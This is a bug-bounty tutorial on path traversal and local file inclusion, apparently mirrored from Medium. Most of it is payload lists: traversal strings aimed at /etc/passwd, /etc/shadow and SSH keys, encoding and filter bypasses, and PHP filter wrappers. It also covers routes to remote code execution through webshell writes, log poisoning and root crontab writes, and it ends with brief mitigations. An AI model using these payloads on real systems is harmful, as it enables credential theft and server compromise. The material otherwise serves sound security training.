The Complete Guide to Path Traversal: Fundamentals, Exploitation, and Mitigation

The Complete Guide to Path Traversal: Fundamentals, Exploitation, and Mitigation | by JPablo13 - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original The Complete Guide to Path Traversal: Fundamentals, Exploitation, and Mitigation Learn how to identify, exploit, and mitigate path traversal and LFI vulnerabilities using advanced techniques and real-world payloads. JPablo13 Follow ~5 min read · April 1, 2026 (Updated: April 1, 2026) · Free: No What is Path Traversal? It is a web security vulnerability that allows an attacker to read arbitrary files on the server running an application. In more severe cases, it can allow file writing, leading to data modification or full server control (RCE). Impact of the Vulnerability: Sensitive Data Disclosure: Access to source code, database credentials, and configuration files. OS Exposure: Reading critical files such as /etc/passwd on Linux or win.ini on Windows. Arbitrary Write: Ability to upload a webshell to execute remote commands. Discovery: Identifying Entry Points In addition to classic parameters ( ?file= , ?path= ), it is important to look for specific backend behaviors: OS Detection: Test Windows ( ..\ ) and Linux ( / ) paths simultaneously to identify the underlying operating system. Error-Based: Trigger errors with characters like <>| to force the server to reveal the absolute path in the error message. Static Analysis: Identify if the server serves static resources (JS/CSS) through a dynamic controller, which is often vulnerable. Tip: Observe the server's response. If modifying the parameter results in errors like File not found or Permission denied , it is a strong indicator that the server is attempting to interact directly with the file system. Exploitation Mechanisms The attack is based on manipulating parameters that the application uses to construct file paths on the disk. Simple Reading If an application loads images using filename=218.png , an attacker can use the ../ sequence to go back levels in the directory structure. Linux Example: ../../../etc/passwd . Windows Example: ..\..\..\windows\win.ini . Advanced Techniques Use of Wrappers (PHP): Use php://filter to obtain the source code of .php files encoded in Base64. Payload: php://filter/convert.base64-encode/resource=index.php . Write Path Traversal: If the function allows saving files, ../ can be used to place a malicious file in the web directory. Impact: Achieve RCE (Remote Code Execution) through a backdoor. Advanced Exploitation and Escalation Once access is confirmed, the goal is to maximize the impact. Source Code Exfiltration (PHP Wrappers) In PHP applications, reading files directly sometimes fails if the file attempts to execute. Using wrappers allows extracting clean code. Technique: php://filter/read=convert.base64-encode/resource=config.php . Result: You receive a Base64 string that, when decoded, reveals the source code and possible DB credentials. From Read to Write (RCE) If the vulnerable point allows writing (e.g., an uploadFile ), an attempt can be made to upload a webshell . Injection: Use filename=../../../var/www/html/shell.php . Execution: Access via browser at https://site.com/shell.php?cmd=id . Special Cases Null Byte ( %00 ): In older versions of languages (such as PHP < 5.3.4), it is used to truncate extensions forced by the application. Payload: ../../../etc/passwd%00.png (the system reads up to the null byte, ignoring the .png ). Absolute Paths: If the code does not concatenate the input to a base path, you can jump directly to the root. Payload: filename=/etc/passwd . Evasion Techniques (Bypass) If an application blocks simple ../ sequences, there are methods to confuse the filter: Nested Sequences: If the filter removes ../ , use ....// so that, when processed, it results in a valid sequence. Null Byte (%00): In older versions of PHP (< 5.3.4), it serves to truncate forced extensions like .jpg or .php . Path Overloading: Inject thousands of /./ sequences to exceed the operating system's reading limit and force the opening of the desired file. Impact Escalation (Vulnerability Chaining) A senior Bug Hunter does not stop at reading; they seek total compromise. From LFI to RCE (Log Poisoning) If you have read access to server logs (Apache/Nginx): Injection: Make a request with malicious code (e.g.: ) in the User-Agent field. Execution: Access the log file via Path Traversal: ?file=../../../../var/log/apache2/access.log&cmd=id . Code Exfiltration (Wrappers) In PHP, use filters to obtain source code without executing it, revealing database credentials and encryption keys: Payload: php://filter/convert.base64-encode/resource=config.php . Critical Files to Consult Depending on the operating system and services, these are the priority targets: |System |File |Interest | |--------|--------------------------------------|-----------------------------------------------| |Linux |/etc/passwd |User enumeration. | |Linux |/etc/shadow |Password hashes (requires elevated privileges).| |Linux |~/.ssh/id_rsa |SSH private keys. | |Windows |C:\windows\win.ini |Vulnerability confirmation. | |Windows |C:\Windows\System32\drivers\etc\hosts |Local network configuration. | Confirmation Payloads (Basic LFI) Use these files to verify the vulnerability quickly and silently. Linux/Unix Based Systems ../../../../etc/passwd ../../../../etc/issue ../../../../proc/self/environ ../../../../etc/hostname Windows Systems ..\..\..\..\windows\win.ini ..\..\..\..\windows\system32\drivers\etc\hosts ..\..\..\..\windows\system32\config\AppEvent.Evt Evasion Payloads (Bypassing Filters) If simple sequences are blocked or removed, use these variants: Nested Sequences (Recursive Stripping) Useful when the filter removes ../ but does not re-check the resulting string. ....//....//....//etc/passwd ....\/....\/....\/windows/win.ini ..././..././etc/passwd Character Encoding Substituting dots and slashes with hexadecimal or Unicode representations. URL Encoding: %2e%2e%2f%2e%2e%2fetc/passwd Double URL Encoding: %252e%252e%252f%252e%252e%252fetc/passwd 16-bit Unicode filter evasion: ..%u2215..%u2215etc/passwd Non-standard encodings: ..%c0%af or ..%ef%bc%8f Payloads for Specific Environments Forced Extension Bypass If the application automatically adds an extension (e.g., .png or .php ), try to truncate the string. Null Byte (PHP < 5.3.4): ../../../../etc/passwd%00.png Parameter Expansion: ../../../../etc/passwd/. Path Overloading (Excessive length): ../../../etc/passwd/./././././.[hundreds of times] PHP Wrappers (Exfiltration) Ideal for extracting source code without the server interpreting it. php://filter/convert.base64-encode/resource=config.php php://filter/read=string.rot13/resource=index.php Writing and Escalation Checklist (RCE) If the parameter allows saving data, the goal is to inject a shell. |Technique |Payload / Target |Purpose | |------------------|--------------------------------|---------------------------------------------------| |Web Directory |../../../var/www/html/shell.php |Write a webshell in the public root. | |SSH Log Poisoning |/var/log/auth.log |Read logs to inject code via username. | |Apache Logs |/var/log/apache2/access.log |Inject PHP code in the User-Agent and then read it.| |User Crontab |/var/spool/cron/crontabs/root |Write a scheduled task to obtain a reverse shell. | Mitigation Strategies Effective prevention focuses on never trusting direct user input to handle system files. Whitelists: The most robust defense. It consists of allowing only predefined filenames or using numerical identifiers (IDs) that the server internally maps to a secure file. Path Normalization: The server must resolve all ../ sequences before validating that the final path starts with the expected base directory (e.g., /var/www/images/ ). Strict Sanitization: Validate that the input contains only alphanumeric characters and reject any request containing dots or slashes. Connect with me GitHub Twitter Support Me ☕ If you found this useful, I would appreciate it if you would follow me and support the content. Medium BuyMeACoffe #cybersecurity #hacking #bug-bounty #technology #penetration-testing Reporting a Problem Sometimes we have problems displaying some Medium posts. If you have a problem that some images aren't loading - try using VPN. Probably you have problem with access to Medium CDN (or fucking Cloudflare's bot detection algorithms are blocking you).